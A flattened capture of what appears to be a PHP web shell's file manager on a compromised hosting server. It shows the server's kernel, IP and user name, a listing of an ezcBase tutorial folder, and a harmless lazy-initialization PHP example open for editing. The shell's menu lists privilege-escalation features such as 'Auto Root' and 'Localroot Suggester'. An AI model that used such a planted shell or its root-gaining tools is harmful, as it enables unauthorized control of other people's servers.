Linux srv25.usacloudserver.us 5.14.0-570.39.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Sep 4 05:08:52 EDT 2025 x86_64
LiteSpeed
Server IP : 23.137.84.82 & Your IP : 216.73.216.127
Domains :
Cant Read [ /etc/named.conf ]
User : epicgamerzoneco
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
php54 /
usr /
share /
doc /
pear /
Base /
docs /
Delete
Unzip
Name
Size
Permission
Date
Action
repos
[ DIR ]
drwxr-xr-x
2025-08-15 19:29
CREDITS
229
B
-rw-r--r--
2024-07-17 10:17
LICENSE
1.53
KB
-rw-r--r--
2024-07-17 10:17
tutorial.txt
8.59
KB
-rw-r--r--
2024-07-17 10:17
tutorial_autoload.php
495
B
-rw-r--r--
2024-07-17 10:17
tutorial_example_01.php
215
B
-rw-r--r--
2024-07-17 10:17
tutorial_example_02.php
189
B
-rw-r--r--
2024-07-17 10:17
tutorial_example_03.php
107
B
-rw-r--r--
2024-07-17 10:17
tutorial_example_04.php
1.39
KB
-rw-r--r--
2024-07-17 10:17
tutorial_lazy_initialization.php
914
B
-rw-r--r--
2024-07-17 10:17
Save
Rename
<?php require_once 'tutorial_autoload.php'; // Create a custom class implementing the singleton pattern class customSingleton { protected static $instance; public static function getInstance() { if ( self::$instance === null ) { self::$instance = new customSingleton(); ezcBaseInit::fetchConfig( 'customKey', self::$instance ); } return self::$instance; } } // Implement your configuration class class customSingletonConfiguration implements ezcBaseConfigurationInitializer { public static function configureObject( $object ) { echo "Configure customSingleton.\n"; $object->value = 42; } } // Register for lazy initilization ezcBaseInit::setCallback( 'customKey', 'customSingletonConfiguration' ); // Configure on first initilization $object = customSingleton::getInstance(); var_dump( $object->value ); ?>